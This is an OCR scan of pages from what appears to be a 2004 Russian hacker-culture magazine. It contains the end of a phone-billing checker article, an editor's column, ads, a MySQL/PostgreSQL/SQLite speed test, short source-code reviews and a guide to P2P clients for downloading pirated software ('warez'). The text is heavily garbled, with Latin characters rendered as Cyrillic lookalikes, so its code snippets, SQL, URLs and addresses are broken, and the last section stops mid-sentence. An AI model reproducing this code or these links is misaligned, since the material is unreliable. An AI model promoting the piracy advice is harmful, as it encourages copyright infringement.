ная дополнительная услуга - АОН, затем 
«Любимый» номер. 



Тариф дополнительной услуги 



ТРеаІ созіТигпОп; II стоимость подключения 
ТРеаІ созіТигпОіі; II отключения 
для абонентки данные аналогичны звонкам, только еди- 
ница тарификации - в секундах от 86400 (сутки) 

ТРеаІ со$ШпеІІ$е; // одно использование, если іСо$Пеп=0 

Основную работу по проверке выгодности 
дополнительных услуг придется делать вруч- 
ную (только стоимость можно будет брать из 
базы), так как они могут быть всевозможные. 

Для поиска выгодных дополнительных ус- 
луг, снижающих стоимость определенных 
звонков в определенное время, надо выде- 
лить возможные звонки и все-все тщательно 
проверить полным перебором. 

А ПР0ГРПММП 0№М 



К сожалению, у многих операторов очень 
непростая тарификация ОРВЗ, и со стороны 
пользователя узнать, сколько было потраче- 
но, можно лишь приблизительно, ведь из 
логов ты можешь узнать только время нача- 
ла соединения, длительность и общий тра- 
фик - полученный и посланный. А операторы 
предпочитают делить эту большую сессию 
на подсессии по 1 5-20 минут, так как соеди- 
нение с СіРРЗ может длиться месяцами, ес- 
ли нет никаких проблем. 

Таким образом, большая сессия из лога 
телефона в 4 часа 1 0 минут может быть по- 



трафика - считать ли сумму по отдельности или учиты- 
вать только входящий трафик 



Бесплатный порог, как и для голосовых 
звонков, задаем 0-ым значением соответ- 
ствующего элемента массива аггауСозі. 

А ДОПОЛНИТЕЛЬНЫЕ УСЛУГИ 

Для дополнительных услуг возможны платы 
за подключение и отключение, абонентская 
и за использование. Самая распространен- 




Желательно, чтобы твоя программа висела в 
памяти и ловила поіііу от сервера логов, об- 
рабатывая новые данные. Их сохраняй (на- 
копленные и проанализированные) сам - 
вдруг сервер логов удалит часть. 

При этом ты можешь использовать лог- 
сервер для узнавания номера при входящем 
звонке. Например, для распознавания - 
бесплатный ли этот звонок для тебя или нет? 



Кто звонит? 



ССаІІегІб *сСаІІІпсотіпд создан заранее 
сСаІІІпсотіпд->6еМе$і(); 

ІІ$ег:;ЩаііРогАпуКедие$і(); 

В сСаІІІпсотіпд-ИТеШитЬег лежит номер телефона. 



На рисунке «ІМокіа 9500» ты можешь уви- 
деть пример работы программы в этом слу- 
чае - ты должен сам следить за тем, чтобы 
пользователь мог ответить на звонок, разре- 
шая стандартным программам телефона 
дальнейшую обработку звонка. 

А РПЗВИТИЕ 

Вот ты и готов сам проверять своего опера- 
тора. Нашу прогу можно всячески улучшить: 
встроить проверку подключения роуминга, 
проверку включения/выключения дополни- 
тельных услуг при помощи ЗМЗ или звонков 
по специальным номерам оператора... 
Сделай это все сам, ты можешь! Удачи! □С 










ВНИИПНИЕ! ВЕЩОЕТ ЛОЗОВСКИЙ! 

В от уже 
н е с - 
колько но- 
м е р о в 
подряд в 
этой руб- 
рике мы 
публикуем 
статьи про 
коди н г для 
мобильных 
девайсов. 

На эту те- 
му я толкал 
речи на 
форуме 
мѵѵшкер.ги и в 
нашем ЖЖ 
(ІШр://м.Ііѵе- 
ІоигпаІ.сош/сот- 
типіІу/х_сгеѵѵ/), 

но особого фидбэка не получил. Поэтому да- 
вай-ка я лучше сам тебе расскажу, почему 
мы этим занялись, ведь далеко не у каждого 
есть Раіпл, не у каждого есть РоскеІРС или 
смартфон и уж точно ни у кого нет всего это- 
го сразу. Значит, как минимум треть читате- 
лей, даже имеющих одно устройство, может 
пролистать страницу, а не имеющие так во- 
обще могут обозвать нас мажорами и скру- 
тить из этой статьи самокрутку? :) Нет, ба- 
тенька, все это глубоко не так. Давай для на- 
чала представим себе рынок программ для 
ѴѴіп и потребность в них. Представил? Пра- 
вильно, по 200 программ каждого вида - это 
круто, и удивительно даже, что авторы мно- 
гих из них получают деньги. Совсем другое 
дело с мобильными устройствами. За ними - 
недалекое будущее. Хотя я и сам сейчас счи- 
таю смартфоны пустым мажорством (наде- 
юсь, Куттер досюда не дочитает :) (дочитал, 
дружок, дочитал - прим. Куттера)), но осоз- 
наю, что в скором будущем обычных телефо- 
нов просто не останется вообще. Зачем по- 
купать обычный, когда умный стоит ненамно- 
го дороже? Да незачем. Та же ситуация и с 
КПК - это удобно, а скоро будет и всем дос- 
тупно. При этом, заметь, в стране пока ощу- 
щается НЕДОСТАТОЧНОСТЬ мобильных 
программеров и их трудов (хотя программ 
написано уже вполне до фига). Так что, ба- 
тенька, читай и изучай, благо эмуляторы ник- 
то не отменял и тестить свои труды ты смо- 
жешь уже сейчас. 

Вопросы, жалобы, предложения и мнения 
сливай на аІехапсІег@геаІ. хакер. ш. Хочешь 
что-то прочесть? Предложи. Не хочешь? 
Предложи и обоснуй. 





САМЕР08Т С ДОСТАВКОЙ НА ДОМ 



ѵѵѵм.датерові.ги ѵѵѵм.е-зііор.ги 



Мы научим тебя 

ЭКОНОМИТЬ! 
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ѲлмгСиЬв. + Ъ игры = 
6-8 А 5‘Р + 3 игры - 
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ѴѴѴѴѴѴ.ѲАМЕРОЗТ.РІІ 



Тел. (095): 928-0360, 928-6089, 928-3574 

пн.-пт. с 09:00 до 21:00 (сб.-вс. с 10:00 до 19:00) 
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а последнее время ты научился работать с большим количеством разнообразных систем хранения данных. Мы изучили как 
сравнительно классические технологии, так и новаторские идеи и менее распространенные приемы. Встал вполне резонный вопрос: 
если есть куча технологий, какой из них отдать предпочтение? Этот вопрос в той или иной форме содержится примерно в половине 
приходящих мне писем. Наиболее полный ответ на него можно получить лишь тестированием производительности самых популярных 
технологий, чем мы сегодня и займемся. 



ТЕСТИРОВПНИЕ ПОПУЛЯРНЫХ СХЕМ ХРПНЕНИЯ ИОННЫХ 




Я давно уже к этому подводил :). 

Ты вправе ожидать, что этот 
материал даст тебе ответ на 
риторический вопрос: «Что 
лучше - МуЗСН_ или рдЗСН_?». 
Но тебе придется приложить 
для этого некоторые умствен- 
ные усилия, ведь, отвечая на 
подобный вопрос, однозначно говорить 
очень сложно. Можно лишь указать, в каких 
условиях тот или иной продукт предпочти- 
тельнее. А уже потребитель должен сделать 
вывод, что лучше всего подходит лично ему. 
Это почти как с автомобилями. Молодому, 
активному человеку без семьи, скорее всего, 
лучше подойдет небольшой спортивный ав- 
томобиль, чтобы катать с ветерком по ули- 
цам ночного города девушек, эффектно 
стартовать со светофоров и таким образом 
самоутверждаться за чужой счет ;). В то же 
время устоявшемуся порядочному семьяни- 
ну ничего лучше просторного универсала не 
придумать - в нем и навоз для дачи возить 
можно, и тещу в магазин отвезти, и на ры- 
балку с друзьями съездить. Сегодня я про- 
тестирую скорость работы разных техноло- 
гий хранения данных на наборе самых раз- 
нообразных тестов, включающих извлече- 
ние, запись, поиск и сортировку данных. 



При этом я постараюсь свести к минимуму 
внешние воздействия на испытательном 
стенде - все ресурсоемкие задачи будут ос- 
тановлены, и мощный сервер будет зани- 
маться лишь одним: выявлять победителя. 

Ну что ж, точи коньки, поехали! 

А ИСПЫТПТЕПЬНЫЙ СТЕНД 

Прежде всего, мне хотелось бы указать ха- 
рактеристики сервера, на котором я прово- 
дил это тестирование. Это довольно мощная 
однопроцессорная машина с камнем Іпіеі 
Репііит 4 2.60 СНг, полугигабайтом быстрой 
памяти и двумя 80 Гб винчестерами, скру- 
ченными в один устойчивый к механическим 
проблемам гаісі-массив. На этой машине 
стоит РгееВЗЭ версии 5. 1 : 

$> ипате -а 

ЕгееВЗО [іозіги 5НЕИА5Е РгееВЗО 5.НЕ1.ЕА5Е #0: Тие $ер 7 

22:57:39 Ю 2004 /изг/оЬі/изг/згс/зуз/МЕѴѴ 

Также на сервере установлен интерпрета- 
тор РНР последней версии 5.0.1 , 

АрасГіе/1 .3.29, Му80І_ 4.0.20 и РозІдгеЗСИ- 
7.4.5. Это основной софт, разумеется, на 
машине заинсталлены и все необходимые 
библиотеки. Что касается настроек, больши- 
нство из них я оставил дефолтными, в том 



числе параметры, напрямую влияющие на 
скорость работы. 

Какие же тестовые задания я подготовил? 
Испытания проводятся в четырех основных ка- 
тегорях: запись в БД, сортировка, поиск и 
сложные запросы. В каждом из них я опери- 
рую таблицами разного объема, содержащими 
поля разного типа. При этом я уделяю особое 
внимание скорости поиска и сортировки не 
только по выстроенному ключу, но и произ- 
вольному полю. Вообще же в итоге получилось 
около десяти различных тестов, которые и 
должны ответить на все твои вопросы. 

А НЕ ВСЕ ТОК ПРОСТО 

На рынке коммерческих БД сейчас происхо- 
дит изрядный ажиотаж: МісгозоЙ, Огасіе, 
ЗуЬазе и ІпТогтіх, основные поставщики 
платформ БД, наводняют прессу рекламными 
материалами, в которых наперебой твердят, 
что их БД самая быстрая и замечательная. 
Причем каждое такое сообщение подкрепля- 
ется результатами тестов, которые посред- 
ством красивых диаграмм и графиков убеж- 
дают потенциальных потребителей в превос- 
ходстве того или иного продукта. Само со- 
бой, каждый производитель для таких акций 
выбирает тест, в условиях которого его про- 
дукт смотрится наиболее предпочтительно. 
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Не поверишь - чтобы хоть как-то упорядочить 
все эти тестирования, была создана даже це- 
лая организация со страшным именем ТРС 
(шѵѵ.ІрсждДрссШаиІІ.а$р). Это объединение 
разработало единые тесты, чтобы сравнять 
шансы различных производителей. 

Но несмотря на все это, производители 
БД продолжают подделывать результаты 
тестов, чтобы показать преимущество 
собственных разработок. За счет чего же 
можно добиться такого псевдовыигрыша в 
производительности? Тут все очень прозрач- 
но. Почти все используемые приемы связа- 
ны, разумеется, с кэшированием данных и 
текстов запросов в памяти. Это очевидное 
решение - ведь если ресурсоемкий запрос, 
на вычисление которого тратится значитель- 
ное время, прокэшировать в памяти, работа 
ускорится в тысячи раз. Некоторые произво- 
дители даже разрабатывают различные тех- 
нологии промежуточного интеллектуального 
кэширования. Вот основные приемы, ис- 
пользуемые производителями для виртуаль- 
ного повышения производительности: 

- Кэширование строк. Здесь в память за- 
ранее загружается буфер данных, с которым 
будет работать тестирующее приложение. 

- Каждый зці-запрос перед исполнением 
проходит синтаксический разбор и компили- 
руется в специальный план. Если эти планы 
хранить некоторое время в памяти специаль- 
ным образом, можно выиграть время на том, 
что не потребуется заново разбирать запрос. 

- Остальные методы жестко привязаны к 
аппаратному обеспечению и завязаны на 
устройство самих БД. 

Все эти хитрости позволяют любому про- 
изводителю создать тепличные условия и 
сделать так, что его БД на заранее известном 
наборе тестов будет смотреться куда лучше 
конкурентных. Поэтому не следует придавать 
большого значения результатам подобных 
сравнений. К чему это я? К тому, что сегодня 
все будет по-честному :). Все тесты будут 
одинаковыми, настройки БД - дефолтными, а 
сервер одним и тем же. Наверное, эти ре- 




зультаты не могут претендовать на объектив- 
ность, но они наглядно покажут все преиму- 
щества и недостатки тех или иных БД с пот- 
ребительской точки зрения. А это очень важ- 
но для тебя при выборе инструмента для 
создания своего крутого проекта :). 

А подготовка К ЗОБЕГУ 

Прежде всего определимся со списком 
участников. Какие же технологии будут се- 
годня проверяться на быстродействие? Я 
решил устроить дуэль давнишних конкурен- 
тов: МуЗОІ_ и розідгез. Также, вне конкурса, 
будет выступать 80Ше - об этом инструмен- 
те я писал в прошлом выпуске X. Всего три 
агрегата, десять тестов. Поехали! 

Первый тест заключается в следующем. 
Создается таблица Іе, имеющая структуру 

Сгеаіе ІаЫе іе(ісІ іпі поі пиІІ ргітагу кеу, ѵаі Еехі); 

Т.е. это набор строк произвольной длины 
с уникальным идентификатором. Тестиро- 
ваться будет скорость, с которой разные БД 
выполняют іпзеіі-запрос в эту таблицу. В об- 
щем виде тестируемый рМр-код будет выгля- 
деть следующим образом: 

Тог($і=0; $і<10000; $і++) { 

$пк1=тсІ5($і): 

*Лиегу("іп$ег1: іпіо іе ѵаІие$('$і', '$т(1')"): 

} 



установка розтовезш 



И ля тех, кто все-таки решил поставить себе розідгев, я рас- 
скажу о собственном опыте установки этой БД. Сначала я за- 
инсталлил все из портов, но это глюкалово отказывалось рабо- 
тать, и я трахался с ним часа два, перерывая весь инет. Потом 
решил собрать нормальный бинарник из исходных кодов, но 
меня вновь постиг облом: сервер не мог создать базовую струк- 
туру БД из-за того, что невозможно было открыть достаточное 
количество се- 
мафоров. Проб- 
лема решилась 
пересборкой 
ядра со следую- 
щими опциями: 
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График 1. Результаты работы на іпзеП-запросах 



Следует заметить, что строка, помещае- 
мая в поле Ѵаі, - это тсІ5-хэш идентификато- 
ра. Мне это показалось довольно простым и 
естественным способом автоматического ге- 
нерирования произвольной строки для изве- 
стного идентификатора. Наверное, ты поду- 
мал, что это не лучший вариант, т.к. тсІ5 - 
сложновычисляемая функция, и ее выполне- 
ние серьезно повлияет на результаты тести- 
рования. Это не так - время вычисления тсІ5 
намного меньше времени, которое тратится 
на добавление записи в таблицу, поэтому 
результаты тестирования сомнений не вызы- 
вают. Зато вызывают кучу удивления. Пос- 
мотри первый график. 

Что уж тут говорить, преимущество МуЗОІ_ 
не вызывает никаких сомнений. РдЗОІ_ делает 
все более чем в 10 раз медленнее, а новичок 
ЗОШе вовсе в сотни. Причем с ростом коли- 
чества вставляемых записей эта разница все 
увеличивается! Чем может быть обусловлено 
такое дикое преимущество МуЗОІ_ перед кон- 
курентами? Видимо, более простой и проду- 
манной схемой представления таблиц БД. 

Что касается ЗОШе - туг все понятно, это ла- 
тает интерпретатор РНР, который компилиру- 
ет текстовые по своей природе данные в би- 
нарные, причем делает это очень долго. 

Наверное, так и должно быть - за любое 
удобство надо расплачиваться. То, что 
Постгрес в 10 раз медленнее вставляет ин- 
формацию в таблицы, для меня стало настоя- 
щим откровением. Я не большой знаток архи- 
тектур БД, но против такого преимущества не 
попрешь. Хотя напрашивается и другой вы- 
вод. Разумно предположить, что Постгрес 
разрабатывали вменяемые люди, и усложне- 
ние структуры БД не было только лишь глупой 
прихотью. По-видимому, это сделано созна- 
тельно, чтобы ускорить работу сервера по вы- 
борке информации. Удалось ли разработчи- 
кам добиться желаемого результата, мы скоро 




Вот сайты 
производителей 
тестируемых БД: 

А Му$ОЬ - 
тл/ѵ.тузлі.огд 
л ЗОШе - 
ѵтѵѵ.зріііе.огд 
л рдЗСІІ. - 
шл/ѵ.розідгезді.огд 




л Различные тесты 
баз данных и ин- 
формацию об ис- 
пользуемых мето- 
диках можно дос- 
тать тут: 
МІрі/ДІеѵ.туздІ. 
сот/ІесИ- 
гезоигсез/ЬепсІі- 
тагкз/ и 

шш.ете к.сот. 




а На нашем диске 
ты найдешь набор 
тестов, который я 
использовал для 
измерения произ- 
водительности, а 
также последние 
версии РНР, 
МуЗСЦ. и 
РозІдгеЗСИ.. 
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В НОМЕРЕ: 



п Тестирование новейших 
моделей КПК, ноутбуков 
и сотовых телефонов 

и Как превратить мобильный 
телефон в телевизор 

Новая услуга компании 
МЕГАФОН 

о Переносим данные 
с ноутбука 

Наши эксперты знают - 
копирование файлов с 
мобильной системы на 
настольную может быть 
легким и приятным занятием! 

ШАГ ЗА ШАГОМ 

• Обновляем прошивку КПК 

• І5ІІО 4.05 - лучшая «читалка» 
теперь и на РРС 

• Чтение русскоязычных 
СНМ-файлов на КПК 

• Карманный звукооператор - 
ѴІТО Зоипб Есіішг 1.4.4 

• Дистанционное управление 
ѴѴіпАтр с КПК 

• РіІеМап - лучший файловый 
менеджер для ЗутЬіапОЗ 



МОБИЛЬНЫЕ 

Ж V Ж КОМПЬЮТЕРЕ 





/■ ✓ ф ф / ✓ 0 



График 2. Результаты работы на беіеіе-запросах. 
Вновь явное преимущество МуЗОЬ 
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График 3. Результаты сортировки при выполнении 
зеіесі-запроса. Постгрес сосет, ЗОШе догоняет 
МуЗОЕ 



увидим. А сейчас давай посмотрим, как быст- 
ро данные удаляются, насколько эффективно 
выполняются беіеіе-запросы (см. график 2). 

Мда. Усложненная структура таблиц 
рдЗОі. опять дает о себе знать. При удале- 
нии данных МуЗСН_ выполняет запросы в 20 
(!) раз эффективнее ближайшего конкурен- 
та. Комментарии тут излишни, все по-преж- 
нему объясняется усложненной структурой 
БД. Но даст ли это хоть какое-то преимуще- 
ство? Ответ на этот животрепещущий воп- 
рос даст третий тест. 

.ІВЫБИРПЕН ДОННЫЕ 

Сейчас я составлю простенький скрипт, ко- 
торый будет сортировать данные по значе- 
нию ѵаі и выплевывать в стандартный поток 
вывода 10 записей с самыми большими 
строками - для сравнения тут применяется 
символьная логика. Тестироваться будет 
скорость выполнения следующего запроса: 

ЗЕИСТ * ГРОМ іе ОШ ВУѵаІ ДЕЗС ИМИ 10; 

В таблицах іе на момент тестирования бу- 
дет находиться 10000 различных записей, и 
задача их сортировки на самом деле не так 
уж и тривиальна. Посмотрим, как с этим 
справятся наши подопытные. Результаты 
разглядывай на третьем графике. 

Удивительно. Постгрес опять проигрыва- 
ет, но на этот раз уже и МуЗОЦ и ЗОШе. 
Причем эта БД работает над запросом при- 
мерно в пять раз дольше своих конкурентов. 
Полный провал. Интересно, что МуЗОІ_ и 
ЗОШе идут ноздря в ноздрю - время выпол- 
нения ими запросов абсолютно одинаково. 
Минусы ЗОШе с лихвой окупились увеличе- 
нием производительности. Сейчас в голову 
приходит только одно: может, дело в ис- 
пользуемом типе іехі? В самом деле, что бу- 
дет, если проделать все эти тесты для строк 
с фиксированной длиной? Сейчас посмот- 
рим... Создаю новую таблицу: 

Реіеіе (гот іе; сігор іаЫе іе; сгеаіе іаЬІе іе (ісі іпі поі пиІІ ргі- 

тагу кеу, ѵаі ѵагсІіаг(40)); 

И запускаю сценарии тестирования зано- 
во. Результаты - шелест волос на голове. 

Нет, ребята, Постгрес - это что-то с чем-то. 
Не знаю, чем это оправдать, но результаты 
тестов только ухудшились. Мне даже лень 
было рисовать график для этого текста :). 

Может, если сортировку проводить по 
построенному ключу ісі, результаты выравня- 
ются? Мне кажется, это было бы логично. 
Сейчас посмотрим. Не тут-то было! Постгрес 
по-прежнему причмокивает, а вперед неж- 
данно-негаданно вырвалась малютка ЗОШе, 
причем она делает мастодонта МуЗОІ_ при- 



мерно в два раза по скорости работы! Вот 
это да. Неожиданный итог, на мой взгляд. 

^выводы 

Выводы. Не люблю это слово. Сам делай 
выводы. А я подытожу. Итак, мы только что 
выявили наглядную причину популярности 
МуЗОІ_ - высокая скорость работы на любых 
запросах, надежность и удобство использо- 
вания. Поняли также, почему РозідгеЗОІ- со- 
сет лапу - это медленное глюкалово, которое 
по скорости работы обделала почти всюду 
малютка ЗОШе. Последняя, надо заметить, 
испытывает затруднения только на вставке 
новых записей в БД, а во всех остальных 
случаях ведет себя просто отлично. Я бы по- 
советовал использовать ЗОШе на небольших 
проектах, где доля вставляемой в БД инфор- 
мации не так уж велика. Посоветовал бы 
также стереть со своего винчестера 
Постгрес. Возможно, я слишком агрессивен 
по отношению к этой базе данных. Возмож- 
но, если объем информации перевалит за 4 
Гб, Постгрес начнет работать очень быстро. 
Возможно, он как-то настраивается. Воз- 
можно... Но мне абсолютно по фигу все эти 
«возможно». Я тестировал потребительские 
качества этого продукта при использовании 
в небольших проектах, и он провалился по 
всем статьям. Откровенно говоря, теперь 
даже лейбл этого проекта - голубой слоник, 
у меня вызывает рвотные позывы. То ли де- 
ло дельфинчик МуЗОІ_. ЗС 
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СОИ СЕБЕ 
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л Описание: Когда-то я очень сильно увлекался музыкой и даже что-то творил с помощью музыкального редактора 
Сакеѵѵаік. Чуть позже я заинтересовался программированием игр, и снова звук был достаточно важным в моем деле. 
Сейчас я отошел от звуковых проблем, но хорошие компоненты всегда меня интересуют, особенно с исходниками, где 
можно посмотреть реализацию и увидеть для себя что-то новое. 



л Особые отличия 

О Лучшая подборка компонентов для 
создания звуковых РЗР-фильтров в 
своих программах (Есііо, Веѵегзе, 
Ріісіі, Ециаіігег, ЗЭ ЗоипсІ и т.д.). 

О Есть и более сложные РМО- 
фильтры типа СІюгиз. 

О Все оптимизировано для работы с 
ЗЗЕ/Зй Моѵѵ, что обеспечивает 
хорошую скорость обработки. 



О Есть компоненты, позволяющие 
получить данные для прорисовки 
спектра или волны звука. 

О Полные исходники. 

О Нет примеров использования и плохие 
доки, поэтому немного тяжело 
разбираться. 




а Диагноз 

Разработчикам игр и звуковым прог- 
раммерам посвящается. Конечно, 
все это можно написать и самостоя- 
тельно, но хотя бы посмотреть, как 
делаются фильтры другими програм- 
мистами (а этот набор писал явно не 
ламер), не помешает. 

а Ссылки 

Забираем файл здесь: 1ііф://сІоі«пІоасІ.сІ$р-ѵѵогх.сІе/?(=сІссІ$р^іІіег_ѵ1.00_(іпаІ_$оигсе.2Ір 



ір соигіс своими руками 



а Описание: На страницах ][ и в своей книге я уже описывал, как создать собственную утилиту ІР СопИд. Для С++ 
такой вариант описан только в книге «Программирование на С++ глазами хакера». Если у тебя нет возможности купить 
эту книгу, не отчаивайся, потому что я предлагаю тебе скачать этот исходник, у которого, правда, чуть меньше 



возможностей. 



а Особые отличия 

О Отличный пример использования 
функции СеіАсІаріегзІпй). 

О Консольная программа, которая 
отображает установленные адапте- 
ры, ІР-адреса, описание, маску, имя 
компьютера и т.д. 

О Все реализовано без использова- 
ния лишних библиотек. 



О Компилится как в 6-й версии, так и 
в .МЕТ. 

О Можно было бы вывести больше 
информации об адаптерах. 



а Диагноз 

Очень неплохой исходник от Зегде ІІ. 
Тзідапкоѵ. Автор явно имеет российс- 
кие корни и своим кодом не опозорил 
нашу страну. Очень добротный код, с 
которым легко разобраться без до- 
полнительного описания. 




а Ссылки 

Исходники забираем здесь: ШрУ/Ьгід$ой.сош/е(1и/Ь5ірсопЕід/Ь$ірсопЕід_іІето.2ір 



ІВС-КПИЕНТ 



а Описание: Я видел разные реализации ІПС-клиентов, но консольный вариант вижу впервые. А что, это 
действительно интересное решение, и мне понравилось, как оно реализовано. Жаль, что протестировать работу 
примера не удалось (у меня открыты только НТТР, РОРЗ и ЗМТР-порты). 



а Особые отличия 

О Симпатичная реализация ІВС- 
клиента в консольном виде. 

О Все выполнено на чистом ѴѴіпАРІ 
без дополнительных библиотек, так 
что можно посмотреть, как реализу- 
ются ІПС-клиенты. 

О Код написан явно непрофессиона- 
лом, но читается он хорошо, даже 
несмотря на комментарии на испанс- 
ком языке. 



О Для компиляции во всех исходниках 
надо убрать подключение #іпсІисІе 
<іозІгеат.Іі>. Я даже не понял, зачем 
оно было нужно. 



а Диагноз 

Любой сетевой программер должен 
увидеть это, а если есть желание, то 
и довести до ума и добавить возмож- 
ностей. Консольный вариант ІРС- 
клиента - действительно нужная 
вещь, так почему бы не создать что- 
то стоящее на основе этого исходно- 
го кода? 




а Ссылки 

Класс в исходниках забираем здесь: ѵѵѵѵѵѵ.ргодгат- 
тегз!іеаѵеп.сот/сІ/сІіск.азрх?І0=Р29196 
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■ Иван Ко, профессор вареза ІзігіехцеаІ.хакер.ги) 



СВЕЖОЯ 

Ѵ0ВЕ2-К0 



/ ХПКЕР/№1 01701/2004 




^ откуда качать ворез? 

Р2Р-Ш ОТВЕТ! 

В мире более 1 0 миллионов человек юзают 
Р2Р-сети для получения любого, даже само- 
го редкого, вареза. И буквально намедни 
верховный суд США отклонил запрос на зак- 
рытие целой серии Реег2Реег клиентов/се- 
тей (Сгокзіег, ЗІгеатСазІ, Кагаа), которые 
подозревались в ущемлении прав ориги- 
нальных правообладателей тиражируемого 
варезниками добра. Простор открыт, и мы 
можем смело ожидать увеличения числа 
доступных ѵѵагег-точек в Сети! 

Р2Р-сети давно признаны самым стабиль- 
ным местом для добычи и распространения 
свежего вареза. Давай разберемся, каким 
софтом лучше всего затовариться для наи- 
более продуктивного и комфортного поиска 
необходимого контента. Я не буду касаться 
самых очевидных грандов Кагаа 
(мѵѵѵ.кагаа.сот) и еМиІе (шѵѵ.епиіе-ргоіесі.пеі), 
они и так у тебя давно стоят и лишь плачут 
по более широкому шлангу в инет, чтобы 
выкачать все и вся. 

Д0Р0СП0К8ТЕВ 2.6 

а ѵѵѵѵѵѵ.дгокзіег.сот 




Софтина, как и множество других данного 
семейства, беспардонно забрасывает рек- 
ламными поп-апами и вписывает в систе- 
му внушительную кучу зруѵѵаге. Для прочи- 
стки говна рекомендуется выбивалка ВРЗ 
Зруѵѵаге/Асіѵѵаге Петоѵег 
( ттѵѵ.Ьи I ІеіргооЕзоП.со т ) . Внешним видом и 
повадками напоминает Могрііеиз/Кагаа. 
Объем доступного добра соответствует 
Кагаа’вскому, т.к. они обе работают на 
базе одной сети РазНѴаск. Над выбором 
особо запариваться не стоит - если уже 
стоит Кагаа, переход на новую прогу мож- 
но отменить. 

РІОІЕТ 1.83 ВЕТО 

а шш. ріоіеі. сот/сІоѵѵпІоасІ/риЬ/Ьеіа 1 83_ 

Софт напоминает ѴѴіпМХ, причем не самой 
лучшей чертой последнего: проект несколь- 
ко раз уже закрывался и воскрешался. Увы, 




сие есть типичная судьба некоммерческого 
Р2Р. Вся тема работает с Мапоіііо-сетью по 
МР2Р-протоколу (шѵшр2р.сот). Фишка про- 
токола в использовании ІЮР вместо при- 
вычного ТСР, что, по заявлению производи- 
телей, гарантирует анонимность. Если вдруг 
клиент не придется по вкусу, можно легко 
выцепить ВІиЬзіег, доступный на сайте Ріоіеі 
и работающий на той же МР2Р. Минус 
ВІиЬзіег’а в наличии надоедливых баннеров. 

Е80ШКЕѴ 1.0 

а ѵшѵѵ. ес!опкеу2000 . сот 



(совершенно понятно, кодеры спустили до- 
менное лавэ на закупку «Арсенального»), и 
его подхватили некие негодяи, которые ста- 
ли впаривать рекламный диалер вместо за- 
конного ЗоиІЗеек. И сейчас ореол скандаль- 
ности сохраняется - сеть работает для сво- 
их, выдавая привилегии на боѵѵпіоасі за ока- 
зание гуманитарной помощи ($5 через 
РауРаІ - и 30 дней ты в топе). Сеть ориенти- 
руется на даунлоад конкретных треков или 
сетов, а не целых альбомов, как в еЭопкеу. 
Здесь можно разыскать самые редкие пес- 
ни, за которыми придется порядочно долго 
постоять в очереди. 

В1ТТ0ВВЕНТ 3.4.2 

а ѵѵшѵѵ.ЬіПоггепІ.сот 



Обозревать лидеров индустрии не планиро- 
валось, однако ейопкеу порадовал свежей 
версией 1.0, катапультировавшейся сразу 
из 0.53, и мне было стыдно ее пропустить. 
Сеть ейопкеу насчитывает более двух мил- 
лионов юзеров и ожидает роста вместе с 
появлением портов родного марочного кли- 
ента под Мае ОЗ X, а вскоре и Шпих. Тут 
главное нововведение, увы, незаметно ѵѵіп- 
юзеру: переход с исключительно виндозной 
МРС базы на ОТ что делает клиент мультип- 
латформенным. Прога не запаривает рекла- 
мой, хотя по умолчанию инсталлит 
Асіѵеііізетепі-шнягу (можно отказаться от 
установки). Приятная фича нового билда - 
монитор левых (Таке) файлов, теперь впа- 
рить тебе «101 далматинца» под видом 
«Матрицы, части 5» будет значительно слож- 
нее :). Сейчас я остаюсь с еМиІе (который 
крутит дела в той же сети), но если еО будет 
и дальше радовать своевременными обнов- 
лениями, измены будет не избежать :). 




Ставшая легендарной Іоггепі-сеть работает 
как с обозреваемым родным клиентом, так 
и с другим - от стороннего производителя 
(ВіНогпасІо, шѵѵ.ШогпасІо.сот). Второй клиент 
более популярен, хотя для меня оказался 
порядочно заморочен по части конфигов. 
Фишка обоих клиентов в том, что там нет 
даже диалога поиска файлов! Ты лишь сду- 
ваешь Тоггепі-файлы со специальных сайтов 
вроде Іоггепігеасіог.сот, іоггепІ$.и$іо и шѵѵ.ІоМог 
гепі.сот. Сеть особенно богата свежими 
фильмами и другими полновесными паками. 

6Ш1ШІ18 1.8.6 





80ІН8ЕЕК 1.54 ТЕ8Т 3^ 

а шш.зізкпеі.огд 

Софтина, чья история началась со скандала: 
их первый официальный домен был потерян 



а ѵшѵѵ.дписіеиз.сот 

СпіЛеІІа-сеть, с которой работает рассмат- 
риваемый клиент, была первой среди деце- 
нтрализованных. Сетка изначально готови- 
лась одной из дочек АОІ_’а, так что мега-ІТ- 
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ІІЕСНѴСВЕЖПЯ Ш0ВЕ2-К0 




барыга быстро распорядился закрыть про- 
ект, едва Р2Р-тема обросла варезными сте- 
реотипами. Однако софт успел разойтись по 
рукам, и доблестные кодеры развили до- 
вольно мощную сетку, за которую цепляется 
и Описіеиз. Клиент работает как с основной 
ОпіЛеІІ’ой, так и с отслоившейся ветвью 02. 
Рекламы и другой спрятанной гнили в кли- 
енте найдено не было! Альтернативой может 
стать хорошо известный Могрбеиз (ѵѵѵѵѵѵ.тог- 
рбеиз.сот) или ВеагЗІіаге (ѵѵѵѵѵѵ.Ьеагзііаге.сот). 



8НПВЕП2П 2.0.2.0 ВЕТО 

а ѵѵѵѵѵѵ.зИагеага.сот 




Где взять столько мозгов для компа, чтобы 
разом крутить ВіІТоггепІ, еМиІе и Описіеиз? 
Мозги нужны лишь твои собственные, чтобы 
найти универсальное решение. Да и они в 
данном случае могут отдохнуть, ибо забот- 
ливый доктор X уже нашел лекарство - 
Збагеага. Клиент работает с ОпиІеІІ’ой, 02, 
Е0К2 и ВТ без каких-либо претензий. Зат- 
руднения могут возникнуть на пару минут 
при конфигурации роутера для работы с но- 
вой сетью, ибо прописка рулесов будет ак- 
курат в 4 раза дольше для обеспечения ра- 
боты по периметру 4 сетей. 

ВС++ 0.4032 ВЕТО 

а сісріизріиз.зоигсеіогде.пеі 




Сети приходят, сети уходят... Одна же из 
старейших ОігесЮоппесІ-сетей остается на 
сцене, набирая до 400 тысяч юзеров. Тулза 
удобна и проста в пользовании, значительно 
меньше тормозит на последнем билде. Из 
замеченных проблем остается лишь ано- 
нимность: история софта помнит случаи, 



когда его юзеры получали предупреждения 
от ІЗР. Предупреждения содержали полный 
список доступного у юзера добра с указани- 
ем того, какие законы и каким образом он 
нарушает!.. С данной сетью дружит и род- 
ной ОігесЮоппесі-клиент (ѵѵѵѵѵѵ.пео-тосіиз.сот). 

Л СВОЙ СОБСТВЕННЫЙ Р2Р? 
ЗОГРЕБИ ВОРЕЗ В СВОЮ СЕТЬ! 




Ответь мне, пожалуйста: сколько можно ха- 
лявничать, заряжать свои Р2Р-клиенты хит- 
рояйцыми хаками, чтобы высасывать гига- 
байты вареза, а самому не отдавать и байта 
народу? Пока со злобными варез-пиявками 
